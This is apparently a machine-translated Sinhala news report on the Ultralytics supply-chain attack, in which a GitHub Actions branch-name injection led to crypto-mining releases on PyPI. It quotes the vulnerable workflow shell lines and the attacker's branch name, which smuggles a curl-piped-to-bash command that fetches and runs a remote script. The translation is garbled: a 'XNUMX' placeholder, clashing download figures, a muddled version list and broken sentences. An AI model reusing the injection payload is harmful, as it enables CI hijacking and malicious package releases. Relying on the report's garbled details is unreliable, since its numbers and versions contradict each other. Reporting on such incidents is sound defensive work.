ප්රහාරකයන්ට Ultralytics Python පුස්තකාල ගබඩාවේ GitHub Actions හසුරුවන්න හිමිකම් සහිත කේතය ක්රියාත්මක කිරීමට හැකි විය, එය රූපවල ඇති වස්තූන් හඳුනා ගැනීම සහ රූප කොටස් කිරීම වැනි පරිගණක දර්ශන ගැටළු විසඳීමට භාවිතා කරයි. ගබඩාවට ප්රවේශය ලබා ගැනීමෙන් පසුව, ප්රහාරකයින් විසින් PyPI නාමාවලියෙහි නව Ultralytics නිකුතු කිහිපයක් ප්රකාශයට පත් කරන ලද අතර, ගුප්ත ව්යවහාර මුදල් කැණීම සඳහා අනිෂ්ට වෙනස්කම් ඇතුළත් විය. පසුගිය මාසය තුළ, Ultralytics පුස්තකාලය PyPI නාමාවලියෙන් මිලියන 6.4 කට වඩා වැඩි වාර ගණනක් බාගත කර ඇත.
නිධිය සම්මුතියට පත් කිරීම සඳහා, අල්ට්රාලිටික්-ක්රියා පැකේජයේ අවදානමක් භාවිතා කරන ලදී, එය GitHub ක්රියා යාන්ත්රණය භාවිතයෙන් GitHub හි ගබඩාවක යම් යම් ක්රියා සිදු කරන විට ස්වයංක්රීයව හසුරුවන්න දියත් කිරීමට භාවිතා කරයි. ultralytics ව්යාපෘතියේ දී, අවදානමට ලක්විය හැකි හසුරුවන්නා pull_request_target සිදුවීමට බැඳී ඇති අතර නව අදින්න ඉල්ලීම් පැමිණි විට කැඳවනු ලැබීය. විශේෂයෙන්, යවන ලද ඇදීමේ ඉල්ලීම්වල කේතය සංයුති කිරීම සඳහා, format.yml හසුරුවන්නා කැඳවා, action.yml ගොනුවේ “ධාවනය” කොටසේ සඳහන් කර ඇති කේතය ක්රියාත්මක කරන ලදී, එහි ආදේශන රටා සහිත shell විධාන අඩංගු විය: git pull origin ${{ github.head_ref || github.ref }} git config --global user.name "${{ inputs.github_username }}" git config --global user.email "${{ inputs.github_email }}"
මේ අනුව, pull request හි සඳහන් Git ශාඛාවේ නම නිසි ලෙස ගැලවී යාමකින් තොරව shell commands වලට ආදේශ කර ඇත. අගෝස්තු මාසයේදී, ultralytics-ක්රියා පැකේජය දැනටමත් echo ශ්රිතයේ බාහිර අගයක් භාවිතා කිරීම හා සම්බන්ධ සමාන අවදානමක් නිරාකරණය කර ඇති බව සැලකිය යුතු කරුණකි: echo “github.event.pull_request.head.ref: ${{ github.event.pull_request .head.ref }} »
GitHub ක්රියා හසුරුවන්නෙහි සන්දර්භය තුළ ඔවුන්ගේ කේතය ක්රියාත්මක කිරීම සංවිධානය කිරීම සඳහා, ප්රහාරකයින් ultralytics ගබඩාවට ඇදීමේ ඉල්ලීමක් යවා, පහත සඳහන් ශාඛා නාමය ලෙස සඳහන් කරයි: openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}ba)
ඒ අනුව, ඇදීමේ ඉල්ලීමක් ලැබුණු විට, ප්රහාරකයා-නිශ්චිත තන්තුව “$(...)” කේතයට ඇතුළත් කරන ලදී, එය හසුරුවන්නා පසුව දියත් කළ විට, “curl -sSfL raw.githubusercontent කේතය ක්රියාත්මක කිරීමට හේතු විය. com/.../file.sh | bash".
GitHub ක්රියා වල සන්දර්භය තුළ ධාවනය වන කේතය ගබඩා ප්රවේශ ටෝකනය සහ අනෙකුත් සංවේදී දත්ත ග්රහණය කර ගැනීමට භාවිතා කළ හැක. GitHub ක්රියා වල ඔවුන්ගේ කේතය ක්රියාත්මක කිරීමේ හැකියාව ඇති ප්රහාරකයින් නිකුතුවක් උත්පාදනය කිරීමට හරියටම සමත් වූයේ කෙසේද යන්න තවමත් පැහැදිලි නැත, එය public.yml හසුරුවන්නාවේ (ප්රහාරකයන් විසින් සත්යාපනය ඉවත් කර ඇත); PyPI හි නිකුතු ප්රකාශයට පත් කිරීමට අවසර දී ඇති ගිණුම) සහ GitHub ක්රියා මඟින් ඔබේ දත්ත නිකුතුවට ඇතුළු කිරීමට හැඹිලි ගොඩනඟන තාක්ෂණය විෂ වීම.
Ultralytics 8.3.41 හි පළමු ද්වේශ සහගත නිකුතුව දෙසැම්බර් 4 වන දින රාත්රී 23:51 ට (MSK) PyPI හි ප්රහාරකයින් විසින් ප්රකාශයට පත් කරන ලද අතර පසුදා දහවල් 12:15 ට ඉවත් කරන ලදී. පස්වරු 15:47 ට, තවත් නිකුතුවක් වන 8.3.42, ප.ව. 16:47 ට පළ කර ඉවත් කරන ලදී. මේ අනුව, ද්වේශ සහගත අනුවාදයන් ආසන්න වශයෙන් පැය 13 ක් සඳහා බාගත කිරීම සඳහා ලබා ගත හැකි විය (PyPI දිනකට අල්ට්රාලයිටික් පුස්තකාලයේ බාගත කිරීම් 250 ක් පමණ වාර්තා කරයි). 8.3.41 සහ 8.3.42 නිකුතුවල බාහිර එකකින් බාගත කළ කේතය අඩංගු විය. සේවාදායකය ක්රිප්ටෝ මුදල් කැණීම සඳහා XMRig සංරචකය.
ව්යාපෘති සංවර්ධකයින් විසින් ගැටළුව නිරාකරණය කර නිවැරදි නිකුතු 8.3.43 සහ 8.3.44 නිර්මාණය කරන ලදී, නමුත් දින දෙකකට පසුව තවත් ප්රහාරයක් එල්ල කරන ලදී, එම කාලය තුළ ප්රහාරකයින් අද 04:41 සහ 05:27 (MSK) ට අමතර අනිෂ්ට නිකුතු දෙකක් ප්රකාශයට පත් කළහ. 8.3.45. 8.3.46 සහ 8.3.44, අනෙකුත් පතල් කේතය ඇතුළත් වේ. විමර්ශනය අවසන් වන තුරු, නව අනුවාද ස්ථාපනය කිරීම නවතා දමා XNUMX නිකුතුව පරායත්තතා ලෙස නිවැරදි කරන ලෙස පරිශීලකයින්ට උපදෙස් දෙනු ලැබේ.
මූලාශ්රය: opennet.ru
